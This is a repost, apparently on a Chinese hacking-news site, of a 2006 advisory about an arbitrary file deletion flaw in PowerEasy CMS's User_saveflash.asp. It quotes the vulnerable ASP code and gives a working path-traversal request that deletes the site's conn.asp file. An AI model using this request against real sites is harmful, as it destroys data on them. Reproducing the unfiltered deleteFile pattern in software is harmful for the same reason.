·	完美空间提供500M免费AS	04-10	·	企业安全之YY内网准入以	04-09
·	企业安全之意识与策略	04-09	·	剑走偏锋:IIS漏洞利用	04-09
·	我来免费网提供100M免费	04-09	·	1122mb.com提供20G超大免	04-08
·	映像劫持与反劫持技术	04-07	·	让所有"暴力删除工具"无	04-07
·	入侵88red系统的详细过程	04-07	·	Sql Injection脚本注入终	04-07
·	vbs+delphi 反弹后门生成	04-07	·	飞讯网提供100MB免费PHP	04-07
·	突破SQL注入攻击时输入框	04-04	·	结合内核和病毒技术的最	04-04
·	Real Player rmoc3260.d	04-04	·	亿万网络今月最后为您提	04-04
·	php+mysql 5 sql inject	04-03	·	Real Player rmoc3260.d	04-03
·	oblog文件下载漏洞	04-03	·	免费啦提供1G-2G免费全能	04-03
·	完全解析网页后门和挂马	04-02	·	一句话开3389（只测试过	04-02
·	萧萧免费空间网提供100M	04-02	·	谷道免费空间网提供1G免	04-01
·	从本地入手解决双线路由	03-31	·	sablog 1.6 多个跨站漏洞	03-31
·	富文本编辑器的跨站脚本	03-31	·	Cookie注入是怎样产生的	03-31

[推荐]动易User\User_saveflash.asp页面存在任意文件删除漏洞

热荐 ★★★★★

动易User\User_saveflash.asp页面存在任意文件删除漏洞

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2007-5-17 10:12:02

信息来源：Bug.Center.Team内部论坛（ http://www.cnbct.org ）

发布日期：2006-12-20 应急事件响应公告（BCTCERA0612）

受影响系统：动易网站管理系统所有版本

安全综述：动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。

漏洞描述：User\User_saveflash.asp文件第97行

whichfile=trim(request("color_url"))

Set Colortxt = fso.OpenTextFile(server.mappath(whichfile),1)
rline = Colortxt.ReadLine
badwords = split(rline,"|")
Colortxt.Close

fso.deleteFile(server.mappath(whichfile))

此代码的位于第79行的CoverColorFile过程，触发条件在第16行，代码如下：

act = trim(request("act"))
If act="" Then
Call Main()
Else
Call CoverColorFile()
End If

此漏洞可以在构造合理的act和color_url后可以删除任何文件

测试方法：构造如下语句，可以删除conn.asp文件：User/User_saveflash.asp?act=aa&color_url=../conn.asp

解决方案：对于没有做好过滤的部分，进行严格的过滤以及修补工作。在有文件读写操作的地方，对客户端抱不信任的态度。

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章： MS-07004分析和利用

下一篇文章：动易Count\Counter.asp页面存在SQL注入漏洞

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

新云CMS Online.asp页面过滤不严	02-26
对网软网上购物系统的漏洞分析	01-09
测试SQL防注入脚本	12-21
Google Xss又出跨站新漏洞	11-06
一次简单的html injection导致的	11-06
风讯、科讯漏洞利用	11-01
Adobe pdf reader URI利用方式浅	10-23
超星阅览器的最新0DAY	10-19
运用SQL Injection做数据库渗透的	09-22
sa-blog 0day	09-22
HTML注入的一些简单想法	09-10
网站登陆接口的攻与防	09-04